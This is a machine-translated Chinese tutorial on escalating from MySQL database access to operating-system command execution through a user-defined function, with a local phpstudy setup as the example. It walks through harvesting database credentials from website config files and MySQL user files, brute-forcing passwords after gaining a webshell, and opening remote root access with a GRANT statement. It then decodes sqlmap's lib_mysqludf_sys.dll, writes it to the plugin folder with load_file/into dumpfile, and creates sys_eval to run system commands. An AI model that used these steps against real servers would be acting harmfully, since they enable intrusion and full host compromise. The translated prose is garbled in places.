MySQL database UDF Power raising learning

——

Prerequisites for database rights :
The server starts the database service and obtains the password of the highest authority user .
except Access Outside the database , Other databases basically have the possibility of database rights .

——
——

Several methods to obtain database user passwords

1、 Look in the root configuration file of the website

I take bear sea here cms1.0 For example , The source code downloaded from the Internet and built on the local phpstudy in .

Look in the root directory of the website .
According to the sensitive keywords in the file name conn、config、data、sql、common 、inc Wait to open the content one by one .
You can also use audit tools to search keywords globally .

Open this file , You can directly see the recorded database configuration information .

——

2、 from mysql Look in the configuration file under the database installation path

/data/mysql/user.myd and user.myi There may be... In the file

open user.myd , There are many encrypted passwords in it .

Then decrypt that string . Get the code root

——

3、 Brute force

And brutally crack the database password , The premise is that the database also supports external connections , Otherwise, the password cannot be exploded .
You can use scripts or tools to explode , At the same time, prepare a blasting dictionary , Can be downloaded online .
Common scripts are php Version and python Version of .
relatively speaking , use php Written in language can avoid that the database does not support external connections . Because in getshell Directly put php Linguistic mysql Upload the blasting script to the target server , So the server directly performs local blasting .
That is, even if the goal mysql Does not support outreach , It can also explode .

* Get the database user password as mentioned above , Besides brute force , It's all based on webshell Under the condition of .webshell Is to the current user permissions , And the database can only be authorized to the current user permission , It's like ~~

——
——

The external connection is not opened

There will be such a mistake , Show that connection to... Is not allowed mysql service .

ERROR 1130 (HY000): Host ‘192.168.43.153’ is not allowed to connect to this MySQL server

First connect locally mysql It can only be viewed through localhost Connect root user .

Execute statement , Let all ip Can be connected to this mysql service .
[email protected] hinder % It means that any host can connect , If you need to specify a host to connect , hold % Replace the position of with the corresponding IP that will do .

GRANT ALL PRIVILEGES ON . TO [email protected]“%” IDENTIFIED BY “root”;

Look again user In the table host and user Column can see , One more piece of data host:% user:root

refresh , from mysql Database grant Reload permission data in table

FLUSH PRIVILEGES;

such , It is equivalent to opening the external connection , It would have reported an error , Now you can connect .

——
——

MySQL database udf Raise the right

MySQL There are many ways to raise rights in the database , Here we only test udf The way to raise the right .

udf Raise the right

udf（user defined function, User defined functions ）,
mysql An extended interface for , By adding custom functions , And we can MySQL Use this function in , Reach the right MySQL Expansion of functions .

udf Conditions for raising rights ：

Be able to log in remotely mysql
mysql Have permission to write to file , namely secure_file_priv The value of is empty .

——

Prerequisites view

Execute statements to view variables secure_file_priv Value .

When secure_file_priv The value of is null , Said restrictions mysqld Not allowed to import | export
When secure_file_priv The value of is /tmp/ , Said restrictions mysqld Import of | Exports can only occur in /tmp/ Under the table of contents
When secure_file_priv Where there is no specific value , Said is wrong mysqld Import of | Export to limit

See me here secure_file_priv The value of is not empty , It is null.
Can be in mysql/my.ini Check to see if there is secure_file_priv Parameters of , If not, we will add secure_file_priv=‘’

Look again secure_file_priv The value of is empty .

——

Upload udf Dynamic link library file

Dynamic link library is a way to realize the concept of shared function library , stay windows In the environment, the suffix is .dll, stay linux In the environment, the suffix is .so . We will put this file in a specific directory , This file contains some functions that execute system commands

And this dynamic link library file （.dll or .so） Where to upload it , according to MySQL Versions are also different

Less than mysql5.1 edition
C:\WINDOWS\udf.dll or C:\WINDOWS\system32\udf.dll
Greater than or equal to mysql5.1 edition
lib\plugin\udf.dll （ That is, under the installation path ）

My version here is larger than 5.1 , So upload to lib\plugin\udf.dll Location .
It can be used select @@plugin_dir Inquire about plugin route

But actually plugin The folder does not exist by default , You can only create it yourself . I am here 5.7 Version of .（ There seem to be a lot of conditions ~）

When it comes to uploading dll file , You have to find it online or somewhere , Some big horses have this function , You can import... With one click .
stay sqlmap and msf There is also a built-in .
sqlmap\data\udf\mysql Under the path Windows and Linux All versions have .

Pass statement

select @@version_compile_os, @@version_compile_machine;

Check the current database and operating system . Then determine to use Windows and 64 Bit dll file .

sqlmap in These dynamic link libraries have been coded to prevent accidental killing , Can't be used directly , The original suffix was .dll_ and .so_ , It needs to be decoded .
sqlmap It also comes with a decoding py Script , stay sqlmap/extra/cloak Under the table of contents

Execute the decoding command in this path ：

python3 cloak.py -d -i E:\all-tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

And then in just dll The decoded file is generated in the directory .

Then import this file into \lib\plugin It's in the document .

Need to go through first webshell Cases or some file upload vulnerabilities put this dll Upload the file to a readable and writable folder , And then through mysql Statement and then move the file to \lib\plugin Folder . For example, move from the root directory of the website to **\lib\plugin** Folder .
sql sentence ：

select load_file(‘E:\\phpstudy_pro\\WWW\\lib_mysqludf_sys.dll’) into dumpfile ‘E:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\plugin\\lib_mysqludf_sys.dll’;

dll File moved to plugin In the folder

——

Create a custom function

The function is called sys_eval, Also use the previously imported dll file ,udf.dll The location of represents the shared package name
Create stored procedures by referencing shared library files ：

create function sys_eval returns string soname “lib_mysqludf_sys.dll”;

View functions

select * from mysql.func;

You can see success Created sys_eval function

Now you can use this function to execute system commands .
Such as ：

select sys_eval(‘whoami’)

End of the process .